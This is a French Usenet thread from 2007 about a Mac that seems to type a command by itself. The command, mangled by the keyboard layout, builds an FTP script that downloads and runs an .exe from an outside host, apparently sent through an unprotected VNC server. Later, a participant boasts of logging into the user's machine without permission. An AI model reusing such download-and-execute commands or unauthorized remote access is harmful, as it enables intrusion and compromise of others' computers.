Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :
Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :
(syste,root(`syste,é`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit
Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.
Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.
Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.
Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce soit. Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche : Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 localhost.6010 *.* LISTEN tcp6 0 0 localhost.6010 *.* LISTEN tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614 ESTABLISHED
c'est pas la peine de la mettre. Enfin perso je ne sais pas quoi en faire. -- Nina
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiGuad@KkBoodin.wanadoo.fr> wrote:
Mon Mac était alors connecté au Net.
Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche :
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 localhost.6010 *.* LISTEN
tcp6 0 0 localhost.6010 *.* LISTEN
tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614
ESTABLISHED
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce soit. Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche : Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 localhost.6010 *.* LISTEN tcp6 0 0 localhost.6010 *.* LISTEN tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614 ESTABLISHED
Merci de me dire ce que cela t'apprend. moi j'y reconnais mon IP interne. Les nombres apres "localhost", sont ce mes ports ouverts ?
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad wrote:
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce soit. Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche : Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 localhost.6010 *.* LISTEN tcp6 0 0 localhost.6010 *.* LISTEN tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614 ESTABLISHED
Merci de me dire ce que cela t'apprend. moi j'y reconnais mon IP interne.
Les nombres apres "localhost", sont ce mes ports ouverts ?
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiGuad@KkBoodin.wanadoo.fr> wrote:
Mon Mac était alors connecté au Net.
Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche :
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 localhost.6010 *.* LISTEN
tcp6 0 0 localhost.6010 *.* LISTEN
tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614
ESTABLISHED
Merci de me dire ce que cela t'apprend. moi j'y reconnais mon IP interne. Les nombres apres "localhost", sont ce mes ports ouverts ?
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad wrote:
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce soit. Dis moi comment faire ca , stp.
Terminal, netstat -a
Le résultat a cette tronche : Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 localhost.6010 *.* LISTEN tcp6 0 0 localhost.6010 *.* LISTEN tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614 ESTABLISHED
c'est pas la peine de la mettre. Enfin perso je ne sais pas quoi en faire.
RiGuad
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad wrote:
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
ben si tu estimes que le réseau MSN trafique sous protocole IRC, ce dont je doute, : oui
Mon aMSN est toujours connecté, effectivement. Mais si je ne me trompe , MSN a son propre protocole fermé propre a Microsoft, non ?
Par contre se connecter avec Snak, ou MIRC pour les pceiste sur des canaux genre Ircnet ou efnet, etc... releve bien du protocole IRC, contrairement aux protocoles fermés de messagerie propriétaire genre MSN ou Yahoo ou AIM, etc...
suis je dans l'erreur ?
On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiGuad@KkBoodin.wanadoo.fr> wrote:
Mon Mac était alors connecté au Net.
Avec un machin IRC lancé en tâche de fond ?
ben si tu estimes que le réseau MSN trafique sous protocole IRC, ce dont
je doute, : oui
Mon aMSN est toujours connecté, effectivement.
Mais si je ne me trompe , MSN a son propre protocole fermé propre a
Microsoft, non ?
Par contre se connecter avec Snak, ou MIRC pour les pceiste sur des
canaux genre Ircnet ou efnet, etc... releve bien du protocole IRC,
contrairement aux protocoles fermés de messagerie propriétaire genre MSN
ou Yahoo ou AIM, etc...
Mon Mac était alors connecté au Net. Avec un machin IRC lancé en tâche de fond ?
ben si tu estimes que le réseau MSN trafique sous protocole IRC, ce dont je doute, : oui
Mon aMSN est toujours connecté, effectivement. Mais si je ne me trompe , MSN a son propre protocole fermé propre a Microsoft, non ?
Par contre se connecter avec Snak, ou MIRC pour les pceiste sur des canaux genre Ircnet ou efnet, etc... releve bien du protocole IRC, contrairement aux protocoles fermés de messagerie propriétaire genre MSN ou Yahoo ou AIM, etc...
suis je dans l'erreur ?
jacques
Nina Popravka wrote:
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça m'intrigue...
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté dès la mise en circulation ou par un téléchargement quelconque en DCC par exemple non ?
Jacques -- « Mac OS X Server à votre Service » en vente au Monde en Tique. <http://www.lmet.fr/fiche.cgi?_ISBN82952726603> Attention, plus que 19 exemplaires.
Nina Popravka <Nina@nospam> wrote:
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
m'intrigue...
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
dès la mise en circulation ou par un téléchargement quelconque en DCC
par exemple non ?
Jacques
--
« Mac OS X Server à votre Service » en vente au Monde en Tique.
<http://www.lmet.fr/fiche.cgi?_ISBN82952726603>
Attention, plus que 19 exemplaires.
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça m'intrigue...
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté dès la mise en circulation ou par un téléchargement quelconque en DCC par exemple non ?
Jacques -- « Mac OS X Server à votre Service » en vente au Monde en Tique. <http://www.lmet.fr/fiche.cgi?_ISBN82952726603> Attention, plus que 19 exemplaires.
Nina Popravka
On Sat, 3 Mar 2007 09:29:09 +0100, (Jacques Foucry) wrote:
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté dès la mise en circulation ou par un téléchargement quelconque en DCC par exemple non ?
Le truc est du à un virus parfaitement classique, qui installe un backdoor qui permet de contrôler la bécane via IRC. T'as un doc intéressant là : <http://honeynet.org/papers/trans/Les-botnets.doc>
C'est très improbable qu'il existe des virus de ce type sur Mac (koike...). En revanche, ce qui est curieux, c'est que dans son histoire, ça ressemble à un truc de contrôle à distance genre VNC. Ou une faille de son logiciel? -- Nina
On Sat, 3 Mar 2007 09:29:09 +0100, jacques@foucry.net (Jacques Foucry)
wrote:
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
dès la mise en circulation ou par un téléchargement quelconque en DCC
par exemple non ?
Le truc est du à un virus parfaitement classique, qui installe un
backdoor qui permet de contrôler la bécane via IRC.
T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>
C'est très improbable qu'il existe des virus de ce type sur Mac
(koike...).
En revanche, ce qui est curieux, c'est que dans son histoire, ça
ressemble à un truc de contrôle à distance genre VNC.
Ou une faille de son logiciel?
--
Nina
On Sat, 3 Mar 2007 09:29:09 +0100, (Jacques Foucry) wrote:
Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté dès la mise en circulation ou par un téléchargement quelconque en DCC par exemple non ?
Le truc est du à un virus parfaitement classique, qui installe un backdoor qui permet de contrôler la bécane via IRC. T'as un doc intéressant là : <http://honeynet.org/papers/trans/Les-botnets.doc>
C'est très improbable qu'il existe des virus de ce type sur Mac (koike...). En revanche, ce qui est curieux, c'est que dans son histoire, ça ressemble à un truc de contrôle à distance genre VNC. Ou une faille de son logiciel? -- Nina
Tu te fous de qui ? Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et sans mot de passe. Tu as de la chance qu'il ne te soit rien arrivé de plus grave que quelques bricolesà l'écran. On y croit pas... -- Nina
On Sat, 03 Mar 2007 00:13:29 -0400, RiGuad
<RiGuad@KkBoodin.wanadoo.fr> wrote:
Tu te fous de qui ?
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton
pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et
sans mot de passe.
Tu as de la chance qu'il ne te soit rien arrivé de plus grave que
quelques bricolesà l'écran.
On y croit pas...
--
Nina
Tu te fous de qui ? Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et sans mot de passe. Tu as de la chance qu'il ne te soit rien arrivé de plus grave que quelques bricolesà l'écran. On y croit pas... -- Nina
joly
Benoit Leraillez wrote:
Nina Popravka wrote:
On y croit pas...
Juste un truc la Nina : où as-tu récupérer son adresse IP publique pour faire tout ça ? Parce que moi je ne vois que du 192.168.0.21 et là...
Voilà... Tout le NG mort de rire doit être en train de visiter son Mac :-) -- Nina
h.sainct
Nina Popravka wrote:
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et sans mot de passe. Tu as de la chance qu'il ne te soit rien arrivé de plus grave que quelques bricolesà l'écran. On y croit pas...
chapeau...
-- Frédérique & Hervé Sainct, [fr,es,en,it] Frédérique's initial is missing in front of the above address l'initiale de Frédérique manque devant l'adresse email ci-dessus
Nina Popravka <Nina@nospam> wrote:
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton
pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et
sans mot de passe.
Tu as de la chance qu'il ne te soit rien arrivé de plus grave que
quelques bricolesà l'écran.
On y croit pas...
chapeau...
--
Frédérique & Hervé Sainct, h.sainct@laposte.net [fr,es,en,it]
Frédérique's initial is missing in front of the above address
l'initiale de Frédérique manque devant l'adresse email ci-dessus
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et sans mot de passe. Tu as de la chance qu'il ne te soit rien arrivé de plus grave que quelques bricolesà l'écran. On y croit pas...
chapeau...
-- Frédérique & Hervé Sainct, [fr,es,en,it] Frédérique's initial is missing in front of the above address l'initiale de Frédérique manque devant l'adresse email ci-dessus
joly
Benoit Leraillez wrote:
arno wrote:
Les entêtes de ses messages...
J'y pensais, mais comme mamadoo ne fait pas de l'IP fixe et que rien ne dit qu'il n'est pas sous modem et non ADSl...
Quelqu'un qui dit laisser touner aMSN en permanence et qui aurait une connexion RTC... c'est tout de même peu probable. Et s'il reste connecté en permanence, il garde son IP au moins 24H, souvent bien plus.
je me demandais si elle avait une autre piste. Parce que la Nina elle a un flair comac.
Pas besoin de sortir le marc de café où les viscères de poulet pour y lire l'adresse IP quand elle apparait en clair :)
J'y pensais, mais comme mamadoo ne fait pas de l'IP fixe et que rien
ne dit qu'il n'est pas sous modem et non ADSl...
Quelqu'un qui dit laisser touner aMSN en permanence et qui aurait une
connexion RTC... c'est tout de même peu probable.
Et s'il reste connecté en permanence, il garde son IP au moins 24H,
souvent bien plus.
je me demandais si elle
avait une autre piste. Parce que la Nina elle a un flair comac.
Pas besoin de sortir le marc de café où les viscères de poulet pour y
lire l'adresse IP quand elle apparait en clair :)
J'y pensais, mais comme mamadoo ne fait pas de l'IP fixe et que rien ne dit qu'il n'est pas sous modem et non ADSl...
Quelqu'un qui dit laisser touner aMSN en permanence et qui aurait une connexion RTC... c'est tout de même peu probable. Et s'il reste connecté en permanence, il garde son IP au moins 24H, souvent bien plus.
je me demandais si elle avait une autre piste. Parce que la Nina elle a un flair comac.
Pas besoin de sortir le marc de café où les viscères de poulet pour y lire l'adresse IP quand elle apparait en clair :)